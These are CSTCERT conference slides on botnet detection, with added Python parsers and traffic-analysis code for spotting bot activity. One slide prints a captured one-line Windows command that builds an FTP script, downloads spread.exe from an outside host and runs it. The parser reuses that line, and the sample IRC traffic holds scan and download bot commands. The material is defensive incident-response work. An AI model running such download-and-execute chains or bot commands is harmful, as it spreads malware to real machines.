1
China Science & Technology Network Computer Emergency Response Team
Botnet Detection and Network Security Alert
Tao JING, jingtao@cstnet.cn
CSTCERT, CNIC, (+86)-010-58812898
CANS 2008, Indiana University, 2008-10-21
2
Agenda
–About CSTCERT
–About Botnet
–Network Security Alert
–Future work
3
CSTCERT Overview
Founded in 2002, CSTCERT (China Science and Technology Network Computer Emergency Response Team) is supervised by CSTNET.
Services:
–Incident handling, including attacks, complaints, abnormal traffic detection and other related security incidents
–Research and development: emergency response
–Security training
Contact: http://cert.cstnet.cn, +86-010-58812935, cert@cstnet.cn
4
Our work
From 2007.9 to 2008.9 we handled 266 security events:
–security incidents: 205
–security complaints: 61
5
Security status is very serious! Why?
You can become a hacker very easily:
–Only a little knowledge is needed
–Hacking methods can be searched for on the Internet
–Many people share their hacking tools
–If you are willing to pay some money, someone will teach you hacking techniques
6
About Botnet
A botnet is a collection of computers, connected to the Internet, that interact to accomplish some distributed task. "Botnet" typically refers to such a system designed and used for illegal purposes. The compromised machines are referred to as drones or zombies, and the malicious software running on them as a "bot".
From: www.shadowserver.org
7
What can a botnet cause? (examples shown as images on the slide)
8
How can we find a botnet?
Active way:
–Network protocol analysis: IRC
–Monitor some special TCP ports (135/139/445/1433/22/2967 ...)
–Check C&C (Command and Control) server address updates from the Internet: http://www.cyber-ta.org/, http://www.shadowserver.org
Passive way:
–Honeypot
10
Main characteristics of a botnet
IRC messages:
–Port scan: advscan, asc ...
–File download: download
–Others: ping/pong, join, mode ...
Scanned TCP ports: 135/139/445/1433/22/2967
Vulnerabilities that botnets usually exploit:
–Weak passwords (SSH/MS-SQL/Windows)
–Overflow vulnerabilities (MS-SQL/Windows/software)
11
How the host was controlled, method 1: sometimes a scan control command is used
12
How the host was controlled, method 2: sometimes malware is installed
14
C:\Documents and Settings\jackie>cmd /c echo open spreadem.nowslate1703.info 21 >appmr.dll &echo user spread baby >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll &echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &spread.exe
ftp> open spreadem.nowslate1703.info 21
Connected to spreadem.nowslate1703.info.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 73 of 200 allowed.
220-Local time is now 00:15. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 2 minutes of inactivity.
ftp> user spread baby
331 User spread OK. Password required
230-User spread has group access to: spread
230 OK. Current restricted directory is /
ftp> binary
200 TYPE is now 8-bit binary
ftp> get
Remote file spread.exe
Local file spread.exe
200 PORT command successful
150-Connecting to port 1555
150 83.1 kbytes to download
226-File successfully transferred
226 0.750 seconds (measured here), 110.70 Kbytes per second
ftp: 85057 bytes received in 1.50Seconds 56.70Kbytes/sec.
ftp> bye
221-Goodbye. You uploaded 0 and downloaded 84 kbytes.
221 Logout.
C:\Documents and Settings\jackie>
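The session above is the whole install method in one command line: the bot writes an FTP script to a file one echo at a time (named appmr.dll so it does not look like a script), feeds it to ftp.exe with -n -s:, deletes the script and launches what it fetched. A host-based detector can recover every indicator from the command line alone. The following parser is an added example for this page, not a tool from the presentation; it splits the cmd.exe chain, rebuilds the echoed script, and reports host, port, user, downloaded and executed files. The only input is the command line from the slide.

```python
import re
from typing import Dict, List

# "ftp -n -s:<script>" runs FTP commands from a file; "-n" suppresses auto-login.
FTP_SCRIPT_RE = re.compile(r"\bftp(?:\.exe)?\b.*?-s:(?P<script>\S+)", re.IGNORECASE)
# "echo <text> >file" or ">>file": the script is written one line at a time.
ECHO_REDIRECT_RE = re.compile(r"^echo\s+(?P<text>.*?)\s*>{1,2}\s*(?P<file>\S+)$", re.IGNORECASE)


def split_commands(cmdline: str) -> List[str]:
    """Split a cmd.exe one-liner on '&', dropping a leading 'cmd /c'."""
    cmdline = re.sub(r"^cmd(?:\.exe)?\s+/c\s+", "", cmdline.strip(), flags=re.IGNORECASE)
    return [seg.strip() for seg in cmdline.split("&") if seg.strip()]


def reconstruct_scripts(segments: List[str]) -> Dict[str, List[str]]:
    """Rebuild every file assembled from echo redirects: {filename: [line, ...]}."""
    scripts: Dict[str, List[str]] = {}
    for seg in segments:
        m = ECHO_REDIRECT_RE.match(seg)
        if m:
            scripts.setdefault(m.group("file").lower(), []).append(m.group("text").strip())
    return scripts


def parse_ftp_script(lines: List[str]) -> dict:
    """Pull host, port, user and fetched file names out of an ftp.exe script."""
    info = {"host": None, "port": 21, "user": None, "files": []}
    i = 0
    while i < len(lines):
        words = lines[i].split()
        verb = words[0].lower() if words else ""
        if verb == "open" and len(words) >= 2:
            info["host"] = words[1]
            if len(words) >= 3 and words[2].isdigit():
                info["port"] = int(words[2])
        elif verb == "user" and len(words) >= 2:
            info["user"] = words[1]
        elif verb == "get":
            if len(words) >= 2:
                info["files"].append(words[1])
            elif i + 1 < len(lines):
                # bare "get": ftp.exe prompts for the remote name, then the local name,
                # which is why the session on the slide echoes spread.exe twice
                info["files"].append(lines[i + 1].strip())
                i += 2
        i += 1
    return info


def analyze_command_line(cmdline: str) -> List[dict]:
    """One finding per 'ftp -s:' invocation whose script was built inline with echo."""
    segments = split_commands(cmdline)
    scripts = reconstruct_scripts(segments)
    findings = []
    for seg in segments:
        m = FTP_SCRIPT_RE.search(seg)
        if not m:
            continue
        script = m.group("script").lower()
        ftp = parse_ftp_script(scripts.get(script, []))
        fetched = {f.lower() for f in ftp["files"]}
        findings.append({
            "script": script,
            "host": ftp["host"],
            "port": ftp["port"],
            "user": ftp["user"],
            "downloaded": ftp["files"],
            # a downloaded name appearing as its own command segment means it was launched
            "executed": [s for s in segments if s.lower() in fetched],
            "script_deleted": any(s.lower().startswith("del ") and script in s.lower()
                                  for s in segments),
        })
    return findings


# The command line from the session shown on the slide.
SAMPLE_CMDLINE = (
    "cmd /c echo open spreadem.nowslate1703.info 21 >appmr.dll &echo user spread baby >>appmr.dll "
    "&echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll "
    "&echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll "
    "&del appmr.dll &spread.exe"
)

if __name__ == "__main__":
    for finding in analyze_command_line(SAMPLE_CMDLINE):
        print(finding)
```

Fed with process-creation logs (Sysmon event 1 or 4688 command lines), the same function turns each such chain into a ready-made alert carrying the download host and the dropped binary name, which is what the incident handler needs first.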
15
Network security alert – IDS/IPS rules
–For port scans: match IRC message words such as asc/advscan
–For network communication with IRC: Ping/Pong, JOIN, PRIVMSG ...
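The two rule ideas above, and the IRC command list on the "Main characteristics" slide, can be tried out on raw IRC lines before they are turned into IDS signatures. The code below is an added example written for this page, not a rule set from the presentation: it counts IRC protocol verbs (a non-IRC port carrying PING/PONG/JOIN/PRIVMSG is itself a signal) and raises an alert for each PRIVMSG whose first word is one of the scan or download commands named on the slides. The sample traffic, the channel and nick names, and the assumption that a scanned port appears as a numeric argument of the command are all constructed.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# Bot command words and scanned ports as listed on the slides. The channel,
# nick and argument layout in the sample traffic below are constructed.
SCAN_COMMANDS = {"advscan", "asc"}
DOWNLOAD_COMMANDS = {"download"}
SCAN_PORTS = {135, 139, 445, 1433, 22, 2967}
IRC_VERBS = {"PING", "PONG", "JOIN", "PRIVMSG", "MODE", "NICK", "USER"}

# ":prefix PRIVMSG target :text" is the line shape in which bots receive orders.
PRIVMSG_RE = re.compile(r"^(?::(?P<prefix>\S+)\s+)?PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")


@dataclass
class Alert:
    line_no: int
    kind: str                  # "scan" or "download"
    command: str
    target_port: Optional[int]
    text: str


def irc_verb(line: str) -> Optional[str]:
    """Return the IRC command verb of a raw line, skipping the optional :prefix."""
    words = line.strip().split()
    if words and words[0].startswith(":"):
        words = words[1:]
    return words[0].upper() if words else None


def irc_verb_counts(lines: List[str]) -> Counter:
    """Count protocol verbs; PING/PONG/JOIN/PRIVMSG on a non-IRC port is suspicious."""
    return Counter(v for v in map(irc_verb, lines) if v in IRC_VERBS)


def inspect_irc_lines(lines: List[str]) -> List[Alert]:
    """Raise an alert for every PRIVMSG whose first word is a scan or download command."""
    alerts = []
    for n, line in enumerate(lines, 1):
        m = PRIVMSG_RE.match(line.strip())
        if not m:
            continue
        text = m.group("text")
        words = text.lstrip(".!").split()      # bots usually prefix commands with . or !
        if not words:
            continue
        cmd = words[0].lower()
        if cmd in SCAN_COMMANDS:
            # first numeric argument that is one of the listed scan ports (assumption)
            port = next((int(w) for w in words[1:] if w.isdigit() and int(w) in SCAN_PORTS), None)
            alerts.append(Alert(n, "scan", cmd, port, text))
        elif cmd in DOWNLOAD_COMMANDS:
            alerts.append(Alert(n, "download", cmd, None, text))
    return alerts


# Constructed sample traffic (not a real capture).
SAMPLE_IRC = [
    ":irc.example.invalid PING :irc.example.invalid",
    ":zombie1!u@10.0.0.5 JOIN :#ctl",
    ":master!o@10.0.0.1 PRIVMSG #ctl :.advscan 445 100 5 0 -r",
    ":master!o@10.0.0.1 PRIVMSG #ctl :.download http://dl.example.invalid/u.exe c:\\u.exe",
    ":master!o@10.0.0.1 PRIVMSG #ctl :hello everyone",
    ":master!o@10.0.0.1 PRIVMSG #ctl :asc 1433 50 3 0",
]

if __name__ == "__main__":
    for a in inspect_irc_lines(SAMPLE_IRC):
        print(f"line {a.line_no}: {a.kind} command {a.command!r} port={a.target_port} -> {a.text}")
    print(dict(irc_verb_counts(SAMPLE_IRC)))
```

Matching the command word at the start of the PRIVMSG text, rather than anywhere in the packet, is what keeps an IDS rule from firing on ordinary chat that happens to mention "asc"; the verb counter covers the second rule, since a flow on port 445 or 1433 should never carry IRC verbs at all.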
16
Rules for IDS (rule listing shown as an image on the slide)
17
Network security alert – network traffic data analysis
We can build a simple mathematical model that describes network traffic data using numerical analysis methods (the NTNA model).
18
NTNA model data, one table each for tcp 1433 scan, tcp 22 scan and other port scan:

  data of src ip    data of counts    amounts of target ip
  Src_ip1           Count_1           Dst_ipsum_1
  Src_ip2           Count_2           Dst_ipsum_2
  ...               ...               ...
  Src_ipn           Count_n           Dst_ipsum_n
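The table above is built per source: how many connection attempts a source made in each scan class and how many distinct target IPs it reached. The aggregation and the scanner rule below are an added example for this page, not the presentation's NTNA implementation: records are (src_ip, dst_ip, dst_port) triples as NetFlow or a firewall log would give them, and a source is flagged when it touched many distinct targets with few attempts each, the profile of a scanning bot as opposed to a client that talks to one server repeatedly. The thresholds and the sample traffic are constructed.

```python
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Set, Tuple

# The slide keeps separate tables for tcp/1433 and tcp/22 and lumps the rest together.
PORT_CLASSES = {1433: "tcp1433", 22: "tcp22"}


@dataclass
class SourceStats:
    counts: Dict[str, int] = field(default_factory=lambda: defaultdict(int))        # "data of counts"
    targets: Dict[str, Set[str]] = field(default_factory=lambda: defaultdict(set))  # distinct dst ips


def classify_port(dport: int) -> str:
    return PORT_CLASSES.get(dport, "other")


def build_ntna_table(records: Iterable[Tuple[str, str, int]]) -> Dict[str, SourceStats]:
    """Aggregate (src_ip, dst_ip, dst_port) records into the per-source table of the slide."""
    table: Dict[str, SourceStats] = defaultdict(SourceStats)
    for src, dst, dport in records:
        cls = classify_port(dport)
        table[src].counts[cls] += 1
        table[src].targets[cls].add(dst)
    return table


def rows(table: Dict[str, SourceStats], cls: str) -> List[Tuple[str, int, int]]:
    """(Src_ip, Count, Dst_ipsum) rows for one scan class, most targets first."""
    out = [(src, st.counts[cls], len(st.targets[cls])) for src, st in table.items() if cls in st.counts]
    return sorted(out, key=lambda r: (-r[2], r[0]))


def scanners(table: Dict[str, SourceStats], min_targets: int = 20,
             max_hits_per_target: float = 2.0) -> List[Tuple[str, str, int, int]]:
    """Flag a source as scanning a port class when it touched many distinct targets with
    few attempts each. Both thresholds are assumptions, not values from the slides."""
    found = []
    for src, st in table.items():
        for cls, n in st.counts.items():
            t = len(st.targets[cls])
            if t >= min_targets and n / t <= max_hits_per_target:
                found.append((src, cls, n, t))
    return sorted(found)


def sample_records() -> List[Tuple[str, str, int]]:
    """Constructed traffic: one MS-SQL scanner, one SSH scanner, two ordinary clients."""
    recs = []
    recs += [("10.1.1.7", f"10.2.0.{i}", 1433) for i in range(1, 61)]                 # 60 hosts, once each
    recs += [("10.1.1.9", f"10.2.1.{i}", 22) for i in range(1, 31) for _ in range(2)]  # 30 hosts, twice each
    recs += [("10.1.1.8", "10.2.0.5", 22) for _ in range(80)]                          # one admin, one server
    recs += [("10.1.1.10", f"10.2.2.{i}", 80) for i in range(1, 6) for _ in range(10)]  # ordinary web client
    return recs


if __name__ == "__main__":
    table = build_ntna_table(sample_records())
    for cls in ("tcp1433", "tcp22", "other"):
        print(cls, rows(table, cls))
    print("scanners:", scanners(table))
```

The ratio Count / Dst_ipsum is the quantity worth watching: the admin who opens 80 SSH sessions to one server has a ratio of 80, the SSH scanner that tries 30 hosts twice has a ratio of 2, and only the second crosses the distinct-target threshold. Tuning min_targets per port class is the "accuracy amendment" the future-work slide mentions.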
19
NTNA model in practice (results shown as figures on the slide)
20
Future work
–Botnet research
–Monitoring and countermeasures for large-scale network worms
–Some improvements to the NTNA model:
  –accuracy amendment
  –extension to larger-scale network traffic data (NetFlow)
  –data mining
21
Thank you!
jingtao@cstnet.cn, (+86)-010-58812898